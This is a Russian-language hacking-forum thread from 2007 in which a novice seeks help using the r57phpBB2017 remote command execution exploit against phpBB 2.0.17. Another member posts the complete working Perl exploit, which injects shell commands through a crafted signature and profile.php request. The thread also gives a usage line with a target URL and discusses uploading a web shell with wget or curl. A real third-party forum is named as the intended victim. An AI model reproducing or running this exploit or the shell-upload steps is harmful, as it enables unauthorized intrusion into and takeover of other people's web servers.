Форумы Вопрос по сплойту от rst для форума phpbb v.2.0.17

Discussion in 'Уязвимости CMS/форумов' started by shiky, 27 Aug 2007.

  1. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Люди прошу помощи со сплойтом rst для форума phpbb v.2.0.17
    Скачал сплойт, запустил... в поле cmd ввел cmd(мб что то другое) мне сплойт пишет что user r57************ sucefull registered. что дальше делать?
     
  2. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Дальше введённая команда должна была выполниться через баг в профиле пользователя.

    У меня с этим эксплоитом ни разу ничего не вышло.
    А вот r57phpbba2e2.pl - phpBB admin 2 exec exploit иногда работал.
    Руками через восстановление БД в админке всё же лучше и надёжнее.
     
  3. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    блин я в этом деле совсем не секу...читал читал и болты =)
    расскажи как "руками через восстановление базы"? буду благодарен
     
  4. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    и еще-использовать команду надо wget или curl чтоб залить шелл на форум. Я так сделал(шелл заливал с ФТП) сплойт пишет тоже самое user registered. Куда дальше идти? ****/forum/r57shell.php? этого файла нету(404 ошибка)
     
  5. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Я обо всех тонкостях прочитал на этом форуме. Советую попробовать поиск.

    Например, http://forum.antichat.ru/thread24488.html
     
    #5 DeBugger, 27 Aug 2007
    Last edited: 27 Aug 2007
  6. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    я просто не разбираюсь в этом...вот...напиши плз как шеллом пользоваться и как его через сплойт загрузить.
     
  7. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Я бы посоветовал сравнить требования сплойта с реальной ситуацией на форуме. Вдруг он там работать не может. Попробуй выполнить команду ls -la (поправьте люди, если напутал). Если получишь список файлов, можно идти дальше.
     
  8. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    а где юзать эту команду? расскажи подробнее плз
     
  9. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Если ты имеешь ввиду именно "phpBB <= 2.0.17 remote command execution exploit" (r57phpBB2017), то про использование всё написано в нём самом. Ввести: r57phpBB2017.pl http://www.site.ru/forum/ ls -la
     
  10. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    выдает сообщение user r57**********sucefull registered
     
  11. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    А ты уверен в уязвимости форума? Успешная регистрация не гарантирует успешное выполнение комманды.
     
  12. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    если хочешь посмотреть на сие чудо-тебе сюда =)

    http://torrents.ok.vsi.ru/forum/
     
    #12 shiky, 29 Aug 2007
    Last edited: 29 Aug 2007
  13. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Вот образец сплойта. Думаю поймёшь, что он делает:
    Code:
    #!/usr/bin/perl 
    
    # phpBB <= 2.0.17 remote command execution exploit 
    # need for work: 
    # 1. PHP 5 < 5.0.5 
    # 2. register_globals=On 
    # 3. magic_quotes off 
    # ------------------------------------------------ 
    # (c)oded by 1dt.w0lf 
    # RST/GHC 
    # http://rst.void.ru 
    # http://ghc.ru 
    # 03.11.05 
    
    use LWP::UserAgent; 
    use HTTP::Cookies; 
    
    if(@ARGV < 2) { usage(); } 
    
    head(); 
    
    $xpl = LWP::UserAgent->new() or die; 
    $cookie_jar = HTTP::Cookies->new(); 
    
    for($i=0;$i<5;$i++) 
    { 
    $rand .= int(rand(9)); 
    } 
    
    $name = 'Gavrik'.$rand; 
    $password = 'Gavrik'.$rand; 
    $path = $ARGV[0]; 
    $cmd = $ARGV[1]; 
    $xpl->cookie_jar( $cookie_jar ); 
    
    $res = $xpl->post( 
    $path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00', 
    
    Content => [ 
    'username' => $name, 
    'email' => $rand.'_bill_gates@microsoft.com', 
    'new_password' => $password, 
    'password_confirm' => $password, 
    'signature' => 'r57:`'.$cmd.'`', 
    'viewemail' => '0', 
    'hideonline' => '1', 
    'notifyreply' => '0', 
    'notifypm' => '0', 
    'popup_pm' => '0', 
    'attachsig' => '0', 
    'allowbbcode' => '1', 
    'allowhtml' => '1', 
    'allowsmilies' => '0', 
    'mode' => 'register', 
    'agreed' => 'true', 
    'coppa' => '0', 
    'submit' => 'Submit', 
    ], 
    ); 
    if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); } 
    else { print "Done. User $name successfully registered!\r\n"; } 
    $res = $xpl->post( 
    $path.'login.php', 
    Content => [ 
    'username' => $name, 
    'password' => $password, 
    'redirect' => '', 
    'login' => 'Log in', 
    ],Referer => $path.'login.php'); 
    
    $res = $xpl->get($path.'profile.php?mode=editprofile'); 
    @content = split("\n",$res->content); 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    for(@content) 
    { 
    if(/<\/textarea>/) { $p = 0; } 
    print $_."\r\n" if $p; 
    if(/<textarea name="signature"/){ $p = 1; } 
    } 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    
    sub head() 
    { 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/ GHC\r\n"; 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    } 
    sub usage() 
    { 
    head(); 
    print " Usage: r57phpBB2017.pl <path> <cmd>\r\n"; 
    print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n"; 
    print " <cmd> - Command for execute\r\n"; 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n" ; 
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; 
    exit(); 
    }
    В версии 2.0.19 эта возможность блокирована, но суть баги жива. Через восстановление БД форума можно изменить необходимые поля и получить шелл.

    Кстати, форум по ссылке мёртв. Кто-то уже добрался?
     
  14. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Возможно-он не отвечает около 2-х недель. но не я виновник =)
     
  15. shiky

    shiky New Member

    Joined:
    26 Aug 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    и еще. сплоит выдал: Done. User Gavrik06526 successfully registered! что дальше делать?
     
  16. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    823
    Reputations:
    1,418
    это первое что нужно. ес ли это выполняетчся, то лучше использовать все вручную, благо сплоит - один единственный запрос к сайту )
     
Loading...